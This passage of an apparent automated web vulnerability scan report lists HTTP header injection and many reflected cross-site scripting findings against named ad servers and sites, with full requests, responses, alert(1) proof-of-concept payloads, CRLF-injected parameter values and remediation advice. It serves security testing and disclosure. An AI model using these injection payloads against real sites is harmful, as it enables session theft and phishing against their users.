GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$\ HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0156ae%0d%0a6ce59d4e5ce; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;
The value of REST URL parameter 2 is copied into the Location response header. The payload 39de9%0d%0a757ae29423 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /servlet/39de9%0d%0a757ae29423 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/39de9 757ae29423/ Date: Sun, 09 Jan 2011 02:54:11 GMT Connection: close Content-Length: 91
The URL has moved to <a href="/servlet/39de9 757ae29423/">/servlet/39de9 757ae29423/</a>
The value of REST URL parameter 2 is copied into the Location response header. The payload 46573%0d%0a0d8c9d6be83 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /servlet/46573%0d%0a0d8c9d6be83 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/46573 0d8c9d6be83/ Date: Sun, 09 Jan 2011 05:28:21 GMT Connection: close Content-Length: 93
The URL has moved to <a href="/servlet/46573 0d8c9d6be83/">/servlet/46573 0d8c9d6be83/</a>
3. Cross-site scripting (reflected)
There are 712 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f1a2"><script>alert(1)</script>29d113731ef was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=8f1a2"><script>alert(1)</script>29d113731ef HTTP/1.1 Host: ad.turn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=8977556597757145533; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:03:23 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:03:23 GMT Connection: close
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae48c'-alert(1)-'49d3e5006f8 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193ae48c'-alert(1)-'49d3e5006f8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:02:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:02:34 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Sun, 09 Jan 2011 02:02:34 GMT Content-Length: 183
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c38'-alert(1)-'3fc1cb53627 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match16c38'-alert(1)-'3fc1cb53627 HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:03:03 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:03:03 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Sun, 09 Jan 2011 02:03:03 GMT Content-Length: 183
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b4f4c<script>alert(1)</script>a52e440cf62 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_261541b4f4c<script>alert(1)</script>a52e440cf62 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=93533324557B6D4C66B8D07696AFDC1E; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Set-Cookie: evlu=075d4a72-84c6-47f7-8419-eab875d87006; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:56 GMT; Path=/ Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:01:49 GMT Connection: close
3.5. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.bluelithium.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f479"-alert(1)-"9f537d45c44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&1f479"-alert(1)-"9f537d45c44=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536160339719001&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:02:46 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 09 Jan 2011 02:02:46 GMT Pragma: no-cache Content-Length: 5050 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?1f479"-alert(1)-"9f537d45c44=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&s=1678185&_salt=2966712294";var RM_POP_COOKIE_NAME='ym ...[SNIP]...
3.6. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserving.cpxinteractive.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 645a9"-alert(1)-"c8cb9b7364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=ad&ad_size=728x90&section=628381\&645a9"-alert(1)-"c8cb9b7364=1 HTTP/1.1 Host: adserving.cpxinteractive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:03:52 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 09 Jan 2011 02:03:52 GMT Pragma: no-cache Content-Length: 4334 Age: 0 Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?645a9"-alert(1)-"c8cb9b7364=1&Z=728x90&s=628381%5c&_salt=3434864609";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 5975c<script>alert(1)</script>1fdfc17438e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=85975c<script>alert(1)</script>1fdfc17438e&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:10 GMT Date: Sun, 09 Jan 2011 02:02:10 GMT Connection: close Content-Length: 3591
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 9a333<script>alert(1)</script>8a4c3dbbfb7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=1641219a333<script>alert(1)</script>8a4c3dbbfb7&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:14 GMT Date: Sun, 09 Jan 2011 02:02:14 GMT Connection: close Content-Length: 3591
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 74eae<script>alert(1)</script>372646ead38 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=164121&c15=74eae<script>alert(1)</script>372646ead38 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:14 GMT Date: Sun, 09 Jan 2011 02:02:14 GMT Connection: close Content-Length: 3591
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload ae5ba<script>alert(1)</script>adbfd959a51 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404ae5ba<script>alert(1)</script>adbfd959a51&c3=9&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:11 GMT Date: Sun, 09 Jan 2011 02:02:11 GMT Connection: close Content-Length: 3591
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c8a72<script>alert(1)</script>d9a8abda3bb was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9c8a72<script>alert(1)</script>d9a8abda3bb&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:11 GMT Date: Sun, 09 Jan 2011 02:02:11 GMT Connection: close Content-Length: 3591
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload c4c5b<script>alert(1)</script>45d5c6bad11 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762c4c5b<script>alert(1)</script>45d5c6bad11&c5=&c6=&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:12 GMT Date: Sun, 09 Jan 2011 02:02:12 GMT Connection: close Content-Length: 3591
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 5bdff<script>alert(1)</script>d89896135b9 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=5bdff<script>alert(1)</script>d89896135b9&c6=&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:13 GMT Date: Sun, 09 Jan 2011 02:02:13 GMT Connection: close Content-Length: 3591
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload dcd0e<script>alert(1)</script>d6e3eca22a6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=dcd0e<script>alert(1)</script>d6e3eca22a6&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:13 GMT Date: Sun, 09 Jan 2011 02:02:13 GMT Connection: close Content-Length: 3591
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc76e<script>alert(1)</script>bcb67c3cc6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faqcc76e<script>alert(1)</script>bcb67c3cc6e HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 327
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faqcc76e<script>alert(1)</script>bcb67c3cc6e was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9edc<script>alert(1)</script>e1d9afc7813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faqc9edc<script>alert(1)</script>e1d9afc7813/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 328
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faqc9edc<script>alert(1)</script>e1d9afc7813/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21a51<script>alert(1)</script>fb51523ad13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq21a51<script>alert(1)</script>fb51523ad13/index.xml HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 337
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faq21a51<script>alert(1)</script>fb51523ad13/index.xml was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7f75<script>alert(1)</script>8dac30374f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
